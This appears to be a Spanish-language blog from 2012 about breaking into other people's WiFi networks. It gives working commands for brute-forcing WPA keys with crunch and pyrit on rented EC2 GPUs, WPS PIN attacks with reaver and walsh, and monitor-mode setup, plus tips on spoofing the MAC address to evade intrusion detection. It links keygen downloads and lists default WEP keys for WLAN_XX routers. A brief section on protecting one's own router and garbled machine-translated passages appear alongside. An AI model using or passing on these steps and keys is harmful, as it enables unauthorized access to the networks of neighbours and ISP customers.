English plantillas curriculums vitae French cartas de amistad German documental Spain cartas de presentación Italian xo Dutch películas un link Russian templates google Portuguese foro de coches Japanese catálogos de Korean entrevistas a Arabic Chinese Simplified

TIENDAS WIFI:


Lo mejor en calidad-precio y rapidez bajo nuestra humilde opinión.
eiUFj

lunes, 30 de abril de 2012

Creador de DICCIONARIOS VODAFONEXXXX con 2 opciones:





Opcion1 :Ocupara 10 terabytes

Opcion2:Se genera de forma aleatoria y con tamaño limitado.

DESCARGAR AQUI:

https://rapidshare.com/files/4201069559/DicVodafone14.zip

Si tienes Windows Xp descargate esto para que funcione:


Ono4xx Libre v1.1: DESCARGAR AQUI!! (Es para android)





CAPTURAS DE PANTALLA:

http://s.slideme.org/cid_1303206659/files/screenshots/05/51/78630-67665.jpg
http://s.slideme.org/cid_1303206658/files/screenshots/05/51/78630-67664.jpg

ONO4xx gratis. WEP WPA KeyGen.
BSSID con 'ONOXXXX "Generador de claves WEP Diccionario de WPA y Por Defecto párrafo Redes Inicio del Ejercicio 00: E0' o '01:38: 91:53' del Proveedor de Servicios de Internet de ONO. Introducir los 4 CARACTERES del ESSID, Junto Con Los ultimos 6 CARACTERES del BSSID y El Tipo de encriptación WEP o WPA párrafo Generar El Diccionario en La Raíz de la SCard.
EN ESTA Primera versión ES necessary La Conexión a Internet éxito PARA QUE SALGA El anuncio, Y una Vez pulsado anuncios en El, segun 'Dic_ONOXXXX_WPA.txt' sí géneros El Diccionario en La Raíz de la SCard Con Nombre 'Dic_ONOXXXX_WEP.txt' o El Tipo De Elegido encriptación, y podeis leer MIENTRAS la publicación.

 Crackeando WPA en Amazons Instancia EC2 con el Tutorial Pyrit:


El tutorial explica como utlizar el servicio de Amazon Cloud Computing mediante una instancia que utiliza dos tarjetas NVIDIA Tesla que dan un rendimiento de 50000 keys/seg con pyrit (Ya sé que una ati decente da mejor rendimiento pero algo es algo)


Estas redes tienen por defecto un password de 10 caracteres decimales, que a razón de 50000 keys/seg y suponiendo que tengamos suerte y la encontremos en la mitad de tiempo es decir en unas 22 horas de un total de 55 horas, que es lo que tardaría si la clave fuera 9999999999, son a razón de 2.1 dólares/hora de alquiler; aproximadamente 58 dólares (al cambio 41 euros aprox)

El comando que habría que ejecutar en el servidor de Amazon una vez se haya configurado todo, o haber ejecutado el script EC2SETUP.sh que se comenta en el tutorial, sería:

Código:
crunch 10 10 0123456789 | pyrit -r ONOXXXX.cap -e ONOXXXX -i - attack_passthrough




                                              http://www.securitytube.net/video/1984


Alguna vez has querido romper una WPA-PSK lo más rápido posible, pero no tiene el hardware para ello? Para aquellos como yo que sólo posee un ordenador portátil. El alquiler de un clúster de GPU de Amazon va a hacer sólo el trabajo. Usted puede alquilar un grupo de GPU para $ 2.10 por hora y puede utilizar hasta 20 grupos (máximo) para acelerar el proceso.trabajo . Usted puede alquilar un grupo de GPU para $ 2.10 por hora y puede utilizar hasta 20 grupos (máximo) para acelerar el proceso.                                                                                                                             
La información sobre grupos de la GPU:
Amazon EC2 ofrece lo que ellos llaman "Cluster GPU instancias", "una nube de Amazon que le proporciona el poder de dos NVIDIA Tesla M2050 de Fermi.                                                                                                                          
Las especificaciones son las siguientes:
·         22 GB de memoria 
· Las         Unidades de 33,5 EC2 Compute (2x Intel Xeon X5570 de cuatro núcleos "Nehalem" arquitectura
·         2 x NVIDIA Tesla "Fermi" M2050 GPUs
·         1690 GB de almacenamiento de instancia
·         plataforma de 64 bits
·           I / O: Muy Alta (10 Gigabit Ethernet
·         API de nombre: cg1.4xlarge
Antes de empezar:
Antes de empezar, asegúrese de que ha creado una cuenta AWS (Amazon Web Service), necesitará una tarjeta de crédito y número de teléfono para su verificación. Una vez que tenga un registro de cuenta en AWS pulgadas 
Selección de un clúster, configurarlo, y el almuerzo:
Me va a utilizar el "Cluster Instancia HVM CentOS 5.5 (IAM ID: ami-aa30c7c3)" la imagen de la máquina como el único con soporte CUDA integrado, y utilizar "Cluster GPU (cg1.4xlarge, 22GB)" como el tipo de instancia . Después de seleccionar la instancia que tendrá que crear un par de claves y descargarlo. Guarde el par de claves en un lugar seguro para su uso posterior para volver a conectar de nuevo a EC2 cuando sea necesario. También tendrá que configurar el grupo de seguridad. Un grupo de seguridad es, básicamente, el firewall y que tendrá que añadir el puerto 22 con el fin de SSH (conectar) a la instancia. Puede configurar el grupo de seguridad por defecto y añadir el puerto 22 a la misma, o hacer un nuevo grupo de seguridad. Nombre y añadir el puerto 22. A continuación, inicie la instancia y conectarse a él mediante la dirección de DNS público. He demostrado esto en mi video tutorial lo puedes encontrar en el siguiente enlace.
WPSCrackGUI v.1.1.5 : (Este va con Wifiway)


Buenas,os dejo aqui un programa (quizas sabreis cual es),para sacar las wpa de los routers que tienen activado wps,no todos lo tienen,este programa es como reaver, simplemente es una gui y tiene bastantes mejoras...





Os dejo un video: 




No hace falta probar con todas... para saber que redes tienen WPS activado usar este comando:

Código: [Seleccionar]
walsh -i mon0 -C

A ver, las redes que permiten descifrar la pass siempre y cuando este WPS activo son las siguientes:
vodafonexxxx wpa y wpa2
Vodafonexxxx wpa y wpa2
orange-xxxx wpa y wpa2
onoxxxx  - wpa y wpa2
onoxxxxxx -wpa y wpa2

Lo que pasa es que para las vodafone, Vodafone y orange pasa algo especial, y es que tienes que cambiar tu mac por la del cliente conectado para poder descifrarlo... algo de eso he leído por la red... aún no lo he probado porque lo he leído hace poco... ya lo probaré a ver que tal.

PD: Por ahora solo he descifrado una ono con este método...




Detectar cualquier clave con cualquier seguridad(WPA,WPA2-PSK) con Reaver v 1.4 gracias a la opcion  WPS del router(que está activada el 95% de las veces) con Backtrack 5 desde Linux:(Si no tienes Linux usa una maquina virtual)


TUTORIAL:


WEB EXPLICATIVA:
http://www.indetectables.net/viewtopic.php?f=60&t=36683&start=15&view=print

WPA al descubierto gracias al WPS del router y sin hacer falta diccionarios:


Muy Buenas a todos,os dejo esto por aqui que supongo que os interesara bastante:


Se ha descubierto una vulnerabilidad en el estándar WPS (Wi-Fi Protected
Setup) que podría comprometer la robustez del PIN.


Wi-Fi Protected Setup, o WPS por sus siglas, es un estándar incluido
en muchos routers y dispositivos wifi que facilita a los usuarios la
creación de redes inalámbricas seguras. Dicho estándar dispone de
varios métodos para agregar dispositivos a una red:
* a través de un número PIN de 8 dígitos
* pulsando un botón de configuración (PBC o Push Button Configuration)
* mediante NFC (Near-Field Communication) acercando los dispositivos al
punto de acceso o router
* utilizando una llave USB que almacena los datos de la configuración


El estándar WPS lo implementan productos de fabricantes como Cisco,
Technicolor, TP-Link, ZyXEL, D-Link, Netgear, Linksys, y Buffalo, entre
otros muchos.


Vamos a ver un ejemplo practico:Reaver lo podeis descargar aqui http://code.google.com/p/reaver-wps/downloads/list o bien usarlo con wifiway (que ya lo lleva incorporado)




1.- Walsh --> Lo que hará es detectar qué APs pudiesen ser vulnerables


Walsh v1.3


Required Arguments:
   -i, --interface=<iface>              Interface to capture packets on
   -f, --file [FILE1 FILE2 FILE3 ...]   Read packets from capture files


Optional Arguments:
   -c, --channel=<num>                  Channel to listen on [auto]
   -o, --out-file=<file>                Write data to file
   -n, --probes=<num>                   Maximum number of probes to send to each AP in scan mode [15]
   -C, --ignore-fcs                     Ignore frame checksum errors
   -5, --5ghz                           Use 5GHz 802.11 channels
   -s, --scan                           Use scan mode
   -u, --survey                         Use survey mode [default]
   -h, --help                           Show help


Ejemplo de uso:   walsh -i mon0


Scanning for supported APs...


00:19:15:XXXXXXXX WLAN_5XXX
00:19:15:XXXXXXXX WLAN_3XXX
X0:21:B7:XXXXXXXX XXXXXXXXX
64:68:0C:XXXXXXXX WLAN_XXXX
C4:3D:C7:XXXXXXXX ONOXXX


Lo debeis parar con control+c


2.- reaver: Sirve para lanzar los PINS e ir probando. Puede llegar a tardar muchas horas (como 11 que tardé yo, por ejemplo)


Uso: reaver -i mon0 -b C4:3D:C7:XXXXXXXX -vv


Resultado


    94.67% complete @ 2012-01-08 08:34:36 (4 seconds/attempt)
    WPS PIN: '5XXXXXXX'
    WPA PSK: '1XXXXXXXXX'
    AP SSID: 'ONOXXXX'




Así que ya sabeis que debeis deshabilitar el WPS de vuestro router chavales.


P.D: La herramienta Walsh para detectar AP´s vulnerables al ataque no funciona en Wifiway,no se el por que,quiza sea beta o quiza este mal programada la utilidad,cuando lo sepa os lo pongo en este mismo post.


P.D: Tengo una manera de saber AP´s vulnerables con una utilidad de mi rt3070,la cual me permite conectarme a cualquier red,teniendo la clave claro xD,lo mejor es eso,que me dice los AP,s que tienen WPS activado,mirad la foto:


http://imageshack.us/f/46/sinttuloapy.png/ REAVER SOLO FUNCIONA CON ROUTERS CON WPS ACTIVADO.


Pero tambien se puede averiguar con Wireshark por si no teneis esa antena ni ese programa:


Ponemos la tarjeta en modo monitor:


airmon-ng start wlan0 (suponiendo que sea wlan0 y no wlan1...etc)


Abrimos el wireshark y en las opciones de captura elegimos interfaz mon0, o la que nos haya dado el airmon. Nos aseguramos que no esté seleccionada ninguna opción tal que así:


http://imageshack.us/f/207/wireshark.png/


Le damos a Start


Empezará a capturar paquetes. Para ver si tiene el WPS activado miramos en los paquetes broadcast la información que se encuentra en:


----->IEEE 802.11 wireless LAN management frame
----------->Tagged parameters:
--------------> Tag: Vendor Specific: Microsoft WPS


Aqui esta el ejemplo:


http://imageshack.us/f/803/wireshark2.png/


Añado una cosa mas que se olvidaba:


Según indican en la página del proyecto la versión svn de kismet detecta los ataques "WPS BruteForce"


http://blog.kismetwireless.net/2012/01/reaver-wps-brute-force-ids.html


Os dejo una imagen para que veais mejor: http://imageshack.us/f/688/reaverkismet.png/


Asi que antes de usar reaver no esta nada mal cambiar la mac a una aleatoria que se os ocurra


P.D: Pongo algo nuevo por que es importante,las redes WLAN_XXXX routers Observa Telecom 00:19:15:XX:XX:XX,el PIN que traen por defecto es 12345670,como podeis ver la clave salta en 10 segundos por que la version de reaver 1.4 prueba ese pin en el primer intento,en esta imagen se comprueba: http://imageshack.us/f/689/reaverz.png/

domingo, 29 de abril de 2012

5 Diccionarios Orange-XXXX WPA con 50 millones de claves en cada uno:

http://www.crack-wifi.com/forum/topic-2280-gros-dico-de-1226000000-cle-pour-livebox-gratuit.html
Keys de todas las marcas de routers :


http://www.routerpasswords.com/
Generador de claves WLAN_XXXX Y JAZZTEL_XXXX:

http://www.xand_r.byethost10.com/Index.html
Listados WLAN_XX: WEP  Testeado 15-01-09


WLAN_00 WEP: Z139400A04300
WLAN_01 WEP: Z139400F19001
WLAN_02 WEP: Z13940067B502
WLAN_03 WEP: Z139400845C03
WLAN_04 WEP: Z139400B01304
WLAN_05 WEP: Z1394001000005
WLAN_06 WEP: Z139400494206
WLAN_07 WEP: Z139400C66007
WLAN_08 WEP: Z139400CFBB08
WLAN_09 WEP: Z139400002309
WLAN_A WEP: Z1394002131A
WLAN_B WEP: Z139400159DB
WLAN_C WEP: Z1394001473C
WLAN_D WEP: Z13940036BED
WLAN_E WEP: Z1394006995E
WLAN_F WEP: Z139400B9C0F
WLAN_10 WEP: Z139400FC0010
WLAN_11 WEP: Z1394008BB011
WLAN_12 WEP: Z1394003D9512
WLAN_13 WEP: Z139400BD0013
WLAN_14 WEP: Z139400E4A114
WLAN_15 WEP: Z139400D76315
WLAN_16 WEP: Z139400E1EC16
WLAN_17 WEP: Z1394006E6D17
WLAN_18 WEP: Z13940092AB18
WLAN_19 WEP: Z139400F9B719
WLAN_00 WEP: Z139400390000
WLAN_1B WEP: Z139400E0D31B
WLAN_1C WEP: Z139400ADF41C
WLAN_1D WEP: Z139400D67D1D
WLAN_1E WEP: Z1394004F721E
WLAN_1F WEP: Z13940069D81F
WLAN_20 WEP: Z13940040D720
WLAN_21 WEP: Z139400D7FA21
WLAN_22 WEP: Z139400D27B22
WLAN_23 WEP: Z13940024AB23
WLAN_25 WEP: Z139400690025
WLAN_26 WEP: Z139400918F26
WLAN_27 WEP: Z1394006FB127
WLAN_28 WEP: Z139400F30528
WLAN_29 WEP: Z1394007C7B29
WLAN_00 WEP: Z13940003CE00
WLAN_2B WEP: Z1394006D022B
WLAN_2C WEP: Z1394009DAF2C
WLAN_2D WEP: Z13940005CD2D
WLAN_2E WEP: Z139400C2EC2E
WLAN_2F WEP: Z13940085EA2F
WLAN_30 WEP: Z139400D6B030
WLAN_31 WEP: Z1394007D7831
WLAN_32 WEP: Z139400CAE32
WLAN_33 WEP: Z139400E16933
WLAN_34 WEP: Z1394001E0934
WLAN_35 WEP: Z1394005F8635
WLAN_36 WEP: Z139400417136
WLAN_37 WEP: Z139400F0B437
WLAN_38 WEP: Z139400588F38
WLAN_00 WEP: Z13940068A400
WLAN_3B WEP: Z139400E5B23B
WLAN_3C WEP: Z1394004C6D3C
WLAN_3D WEP: Z1394006CB73D
WLAN_3E WEP: Z139400AA493E
WLAN_3F WEP: Z139400367F3F
WLAN_40 WEP: Z139400259D40
WLAN_41 WEP: Z139400243241
WLAN_42 WEP: Z139400D47842
WLAN_43 WEP: Z1394001DEC43
WLAN_44 WEP: Z139400F37344
WLAN_45 WEP: Z13940061C045
WLAN_46 WEP: Z139400D9DC46
WLAN_47 WEP: Z13940000FD47
WLAN_48 WEP: Z139400001348
WLAN_49 WEP: Z13940034AF49
WLAN_00 WEP: Z1394004E3300
WLAN_4B WEP: Z1394006F694B
WLAN_4C WEP: Z13940022F54C
WLAN_4D WEP: Z139400B3424D
WLAN_4E WEP: Z139400EDD24E
WLAN_4F WEP: Z139400A31E4F
WLAN_50 WEP: Z139400956850
WLAN_51 WEP: Z139400742F51
WLAN_52 WEP: Z139400131F52
WLAN_53 WEP: Z139400100BA53
WLAN_54 WEP: Z13940024C54
WLAN_55 WEP: Z139400161F55
WLAN_56 WEP: Z139400411656
WLAN_57 WEP: Z139400151457
WLAN_58 WEP: Z139400D25758
WLAN_59 WEP: Z139400B93159
WLAN_00 WEP: Z1394009FC400
WLAN_5B WEP: Z13940034B15B
WLAN_5C WEP: Z13940087115C
WLAN_5D WEP: Z13940081775D
WLAN_5E WEP: Z13940074CF5E
WLAN_5F WEP: Z139400F54F5F
WLAN_60 WEP: Z1394008ED760
WLAN_61 WEP: Z139400177761
WLAN_62 WEP: Z139400AFEC62
WLAN_63 WEP: Z139400B15D63
WLAN_64 WEP: Z139400179C64
WLAN_65 WEP: Z13940027AB65
WLAN_66 WEP: Z139400626766
WLAN_67 WEP: Z139400088167
WLAN_68 WEP: Z139400B62468
WLAN_69 WEP: Z139400E30169
WLAN_00 WEP: Z139400419F00
WLAN_6B WEP: Z1394005C116B
WLAN_6C WEP: Z139400E3876C
WLAN_6D WEP: Z1394007E5C6D
WLAN_6E WEP: Z13940027886E
WLAN_6F WEP: Z13940053006F
WLAN_70 WEP: Z13940078B470
WLAN_71 WEP: Z139400B21271
WLAN_72 WEP: Z139400922772
WLAN_73 WEP: Z139400595D73
WLAN_74 WEP: Z13940036EB74
WLAN_75 WEP: Z1394003B6C75
WLAN_76 WEP: Z139400221976
WLAN_77 WEP: Z1394001BCC77
WLAN_78 WEP: Z139400404178
WLAN_79 WEP: Z139400002979
WLAN_00 WEP: Z1394001EC00
WLAN_7B WEP: Z139400E127B
WLAN_7C WEP: Z1394009E207C
WLAN_7D WEP: Z13940053FB7D
WLAN_7E WEP: Z139400EE447E
WLAN_7F WEP: Z139400E6887F
WLAN_80 WEP: Z139400BBC580
WLAN_81 WEP: Z139400F00981
WLAN_82 WEP: Z139400A21882
WLAN_83 WEP: Z1394001F4083
WLAN_84 WEP: Z139400E8C084
WLAN_85 WEP: Z139400FB6B85
WLAN_86 WEP: Z139400007286
WLAN_87 WEP: Z139400787E87
WLAN_88 WEP: Z139400D77888
WLAN_89 WEP: Z139400C7B189
WLAN_00 WEP: Z1394001C5300
WLAN_8B WEP: Z13940072008B
WLAN_8C WEP: Z13940020A48C
WLAN_8D WEP: Z139400A85C8D
WLAN_8E WEP: Z139400B24D8E
WLAN_8F WEP: Z139400D5A08F
WLAN_90 WEP: Z139400BFD390
WLAN_91 WEP: Z139400766291
WLAN_92 WEP: Z139400C90692
WLAN_93 WEP: Z1394002C9093
WLAN_94 WEP: Z13940094E594
WLAN_95 WEP: Z139400FAF95
WLAN_96 WEP: Z13940023BC96
WLAN_97 WEP: Z139400441F97
WLAN_98 WEP: Z139400E28F98
WLAN_99 WEP: Z139400D29F99
WLAN_00 WEP: Z13940025BB00
WLAN_9B WEP: Z139400B1139B
WLAN_9C WEP: Z139400D1DB9C
WLAN_9D WEP: Z13940024859D
WLAN_9E WEP: Z13940059E99E
WLAN_9F WEP: Z139400496B9F
WLAN_A0 WEP: Z139400EDA5A0
WLAN_A1 WEP: Z139400EF28A1
WLAN_A2 WEP: Z139400ED3BA2
WLAN_A3 WEP: Z139400A7D5A3
WLAN_A4 WEP: Z139400A420A4
WLAN_A5 WEP: Z1394001E40A5
WLAN_A6 WEP: Z139400333DA6
WLAN_A7 WEP: Z139400AA35A7
WLAN_A8 WEP: Z139400CB4FA8
WLAN_A9 WEP: Z13940022FDA9
WLAN_AA WEP: Z139400208EAA
WLAN_AB WEP: Z139400F325AB
WLAN_AC WEP: Z139400008CAC
WLAN_AD WEP: Z1394007080AD
WLAN_AE WEP: Z139400CD61AE
WLAN_AF WEP: Z139400006FAF
WLAN_B0 WEP: Z139400AB05B0
WLAN_B1 WEP: Z1394000160B1
WLAN_B2 WEP: Z139400F8FDB2

lunes, 16 de abril de 2012

Encontrar instrusos en tu red sin necesidad de Windows vista con ''Wnetwatcher'':



Descripción
Vigilante de red inalámbrica es una pequeña utilidad que escanea su red inalámbrica y muestra la lista de todos los equipos y dispositivos que están conectados a la red.
Para cada equipo o dispositivo que se conecta a la red, la siguiente información: dirección IP, dirección MAC, la empresa que fabricó la tarjeta de red y, opcionalmente, el nombre del equipo.
También puede exportar la lista de dispositivos conectados en html / xml / csv / texto, o copiar la lista en el portapapeles y luego pegarlos en Excel o una aplicación de hoja de cálculo.
Requisitos y limitaciones del sistema
  • Esta utilidad funciona en Windows 2000, Windows XP, Windows Server 2003/2008, Windows Vista y Windows 7.
  • Esta utilidad sólo puede escanear una red inalámbrica que está conectado. No se puede escanear otras redes inalámbricas.
  • En raros casos, es posible que la Vigía de red inalámbrica no se detecta el adaptador de red inalámbrica correcta, y entonces usted debe ir a la ventana de “Opciones avanzadas” (F9), y elegir manualmente el adaptador de red correcta.
  • A pesar de esta utilidad es oficialmente diseñado para redes inalámbricas, también se puede usar para examinar una pequeña red con cable.
100% probado por mi.
Asi pueden saber quien esta conectado y cambiar la clave o ocultar la red.
Simplemente se ejecuta y se le da play.
Descargar aqui:  http://ul.to/z3wm9kxv
4º Mejor programa de android ''WifiLeaks'',  para hackear wifi desde tu movil:

 (Ya explique en posts anteriores como se instala en el movil  con Androzip porque en market no esta)

DESCARGAR AQUI!!!  

http://uploaded.net/file/5wub5395

***Despues de Wlandroid,Penetrate Pro y Router Keygen, este para mi gusto es el 4º programa mas eficaz para captar wifi sin necesidad de diccionarios ni fuerza bruta con beini ni wifiway.
Seguridad en nuestra red: Anti-intrusos.


1)Cambiar la contraseña por defecto de nuestro router.


2)Bloquear la MAC del cliente que este conectado ilegalmente en nuestra conexion, raro es el que sabe cambiar su MAC para volver a intentarlo.


3)Cambiar nuestro router de telefonica,jazztel,orange o vodafone por defecto por uno como las marcas  Belkin, D-Link, Netgear, Zyxel TP-Link  

4)Cambiar el nombre de nuestra red con uno de estos nuevos routers y la contraseña por defecto de la compañia que usamos.

Asi , ni pasando diccionarios ni usando programitas que cualquier tonto puede usar para acceder a tu conexion podra usar tu linea ilegalmente. (Aunque yo sea partidario del uso 'responsable' de la wifi del vecino en algun momento muy casual).




martes, 10 de abril de 2012


WPSCrackGUI v1.0.8 (Reaver-WPS) TUTORIAL:

http://www.youtube.com/watch?v=UxNfP4gpKls&feature=player_embedded#!



WPSCrackGUI es una interfaz gráfica para el crackeo de redes wireless con WPS. Es fase Alpha así que tiene errores, verifiquen si funciona!

Requerimientos:
Gambas 2 (o superior).
xTerm.
Reaver v1.4 (preferentemente la ultima)

Instalación:

Se instala como un simple ejecutable .deb (no doy soporte para otros que no sean AirUbuntu, Ubuntu y Debian)
Si no encuentran el Ejecutable en el menú de aplicaciones, creen uno nuevo: /usr/bin/wpscrackgui.gambas el icono debería estar en el mismo lugar.

Soporte:
AirUbuntu v4
Ubuntu 11.10
Debian
Mandriva
openSUSE